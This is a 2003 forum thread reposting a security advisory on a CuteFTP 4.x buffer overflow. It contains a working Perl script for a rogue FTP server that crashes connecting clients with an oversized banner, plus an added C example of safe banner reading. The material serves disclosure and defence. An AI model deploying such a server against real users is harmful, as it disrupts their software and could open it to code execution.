Cute FTP buffer overflow exploit

Author: ShaolinTiger | Location: Kuala Lumpur, Malaysia | Posted: Sun Jan 05, 2003 8:42 pm | Post subject: Cute FTP buffer overflow exploit
    ----
Damage Hacking Group security advisory www.dhgroup.org

Product: CuteFTP client
Authors: GlobalSCAPE Inc. [www.globalscape.com]
Vulnerable versions: v.4.*
Vulnerability: buffer overflow


Overview

"CuteFTP is a Windows based File Transfer Protocol (FTP) client that
allows users to utilize the capabilities of FTP without having to
know all the details of the protocol itself. CuteFTP simplifies FTP
by offering a user-friendly Windows interface instead of a cumbersome
command line utility. CuteFTP gives novice PC users the ability to
upload, download and edit files on remote FTP servers around the world."

Problem

It's possible to crash CuteFTP (and run shellcode(?)) by sending a
long (>2048b) FTP banner to it. As you understand, this problem could
be used by an FTP server.

Fix
Download the new version from www.globalscape.com.

Exploit

#!/usr/bin/perl

#Here is an example of an FTP server. It will freeze each
#CuteFTP user that tries to connect to it.

use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981
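
An added example (not part of the advisory or the post above, and not CuteFTP's code): a bounded reader for the server's greeting line, the client-side check that keeps an oversized banner from overrunning a fixed buffer. The 2048-byte cap is an assumption taken from the advisory's ">2048b" threshold; `read_banner_line` and the sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: cap taken from the advisory's ">2048b" threshold. */
#define BANNER_CAP 2048

enum banner_status { BANNER_OK = 0, BANNER_TOO_LONG = -1, BANNER_INCOMPLETE = -2 };

/*
 * Copy one LF- or CRLF-terminated reply line from `in` (inlen bytes, as
 * received from the socket) into `out` (outcap bytes). Never writes more
 * than outcap bytes; NUL-terminates and sets *consumed on BANNER_OK.
 */
enum banner_status read_banner_line(const unsigned char *in, size_t inlen,
                                    char *out, size_t outcap, size_t *consumed)
{
    for (size_t i = 0; i < inlen; i++) {
        if (in[i] == '\n') {
            size_t len = i;
            if (len > 0 && in[len - 1] == '\r')
                len--;                      /* strip the CR of CRLF */
            if (len >= outcap)
                return BANNER_TOO_LONG;     /* no room for text + NUL */
            memcpy(out, in, len);
            out[len] = '\0';
            *consumed = i + 1;
            return BANNER_OK;
        }
        if (i >= outcap)
            return BANNER_TOO_LONG;         /* give up early, do not keep buffering */
    }
    return BANNER_INCOMPLETE;               /* caller reads more, up to its own limit */
}

int main(void)
{
    char line[BANNER_CAP];
    size_t used = 0;
    const unsigned char ok[] = "220 Service ready\r\n";   /* constructed sample */
    unsigned char big[BANNER_CAP + 1];                    /* constructed: 2049 bytes, no newline */
    memset(big, 'a', sizeof big);

    printf("normal:   %d\n", read_banner_line(ok, sizeof ok - 1, line, sizeof line, &used));
    printf("oversize: %d\n", read_banner_line(big, sizeof big, line, sizeof line, &used));
    return 0;
}
```

A client that gets `BANNER_TOO_LONG` should close the connection rather than truncate and continue, since the rest of the stream can no longer be parsed as FTP replies.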

Author: flw | Location: U.S.A. | Posted: Sun Jan 05, 2003 10:31 pm | Post subject:
    ----
Quote:
Damage Hacking Group security advisory www.dhgroup.org


For the few of us that are a bit rusty in our Russian/Slovak skills, is there an English version or a similar site in English?

Author: ComSec | Posted: Sun Jan 05, 2003 10:56 pm | Post subject:
    ----
Translate to English from here:

http://www.worldlingo.com/products_services/worldlingo_translator.html

Just tested it... works OK.


